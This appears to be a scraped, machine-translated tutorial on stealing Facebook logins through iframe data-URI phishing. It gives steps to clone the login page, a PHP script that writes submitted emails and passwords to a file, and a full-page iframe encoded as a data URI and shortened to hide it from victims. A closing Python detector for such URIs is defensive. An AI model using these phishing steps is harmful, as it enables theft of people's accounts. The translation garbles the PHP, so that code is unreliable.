How to Use iframe URI for phishing

Source: Internet
Author: User

This document describes how to perform a phishing attack that steals a Facebook login account. The process is very simple and mainly involves two steps: creating a phishing page that imitates the login page of the target website, and creating a phishing URI that leads to it. It is a basic method to look at if you are new to phishing.

I. Create a phishing page

For example, to steal a Facebook login account, a total of three files are involved: index.html, login.php, and password.txt.

Step 1: Create an index.html login page

First, open the https://www.facebook.com page and copy the source code to the index.html file.

Edit the index.html file and find

<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" method="post" onsubmit="return window.Event &amp;&amp; 
Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)">

Change the value of action

action=login.php?"https://www.facebook.com/login.php?login_attempt=1"

(login.php is used to steal the login account and password.)

Put index.html in the web directory. (My files are stored in the /Library/WebServer/Documents/facebook directory.)

Step 2: Create login.php, the script that steals Facebook accounts and passwords

<? Phpheader ('location: https://www.facebook.com '); // jump to the real facebook page $ handle = fopen ("password.txt", ""); // write the postdata submitted on the counterfeit page to the foreach ($ _ POST as $ variable =>$ value) {fwrite ($ handle, $ variable); fwrite ($ handle, "= "); fwrite ($ handle, $ value); fwrite ($ handle, "\ r \ n");} fwrite ($ handle, "===================\ r \ n"); fclose ($ handle); exit;?>

Step 3: Create the password.txt file that receives postdata

dani-2:facebook leedani$ pwd /Library/WebServer/Documents/facebookdani-2:facebook leedani$ sudo touch password.txt  dani-2:facebook leedani$ sudo chmod a+w password.txt  

Step 4: Test

Log on to http://localhost/facebook/

Enter the email and password, and click Login

Upload password.txt File

dani-2:facebook leedani$ cat password.txt  

Check that the email and pass fields are the login accounts and passwords of facebook.

II. Create a phishing URI

Generally, phishing of this kind uses an iframe to cover the original page with the phishing page. The next operation is to generate a data: URI that does this and convert the URI to a short address.

Step 1: Generate attack code

Src is the address where you store phishing pages.

<style> body {margin:0; overflow:hidden;}</style><iframe src="http://localhost/facebook/" height="100%" width="100%" border="no" frameBorder="0" scrolling="auto">iFrame Failed</iframe

Step 2: Convert the attack code to data: URI

Log on to http://dopiaza.org/tools/datauri/index.php and paste the authorization code,

Corresponding data: URI

Data: text/plain; charset = UTF-8; base64, encoding +

Change data: text/plain in data: URI to data: text/html.

Data: text/html; charset = UTF-8; base64, encoding +

After accessing the modified Data URI, we can see that

Clicking the Facebook icon or the URL below it (Browse facebook.com) goes to the fake Facebook login page, http://localhost/facebook/, that we created in step 1.

Step 3: generate data: short address corresponding to URI

Obviously, this URI is too long and may cause suspicion. in the real environment, we can convert short URLs first, such as http://tinyurl.com/just remove this service.

Finally, the victim is tempted to click the URI that will connect to the phishing page to steal the account and password.
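
A defender-side check for the technique described above, as an added example that is not part of the original article: it finds data: URIs in a message or page, decodes them, and flags text/html payloads that frame a remote page. The function names, the regular expressions and the sample message (with its .invalid host) are constructed for illustration.

```python
import base64
import re
from urllib.parse import unquote

# data:[<mediatype>][;base64],<payload> -- payload runs to whitespace or a quote
DATA_URI = re.compile(r"data:([^,\s\"'<>]*),([^\s\"'<>]+)", re.IGNORECASE)
IFRAME_SRC = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.IGNORECASE)
FULL_PAGE = re.compile(r"(?:height|width)\s*=\s*[\"']?100%", re.IGNORECASE)


def decode_data_uri(header, payload):
    """Return (media_type, decoded_text) for one data: URI."""
    params = [p.strip().lower() for p in header.split(";")]
    media_type = params[0] or "text/plain"  # RFC 2397 default
    if "base64" in params[1:]:
        raw = unquote(payload)
        raw += "=" * (-len(raw) % 4)  # tolerate stripped padding
        try:
            body = base64.b64decode(raw).decode("utf-8", "replace")
        except ValueError:
            body = ""  # undecodable payload: nothing to inspect
    else:
        body = unquote(payload)  # percent-encoded form
    return media_type, body


def find_framing_data_uris(text):
    """Flag data: URIs whose HTML body frames a remote page."""
    findings = []
    for header, payload in DATA_URI.findall(text):
        media_type, body = decode_data_uri(header, payload)
        match = IFRAME_SRC.search(body)
        if media_type == "text/html" and match:
            findings.append({
                "framed_url": match.group(1),
                "full_page": bool(FULL_PAGE.search(body)),
            })
    return findings


# Constructed sample: message body carrying one framing URI and one benign image URI.
_html = '<iframe src="http://login.example.invalid/" height="100%" width="100%"></iframe>'
SAMPLE = (
    "Please verify: data:text/html;charset=UTF-8;base64,"
    + base64.b64encode(_html.encode()).decode()
    + " and logo data:image/png;base64,iVBORw0KGgo="
)
```

Run over mail bodies or proxy logs, `find_framing_data_uris` returns the framed URL for each hit, which can then be checked against the domain the message claims to come from.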

Reference: http://www.hackingarticles.in/hack-email-or-facebook-password-using-iframe-uri-phishing/
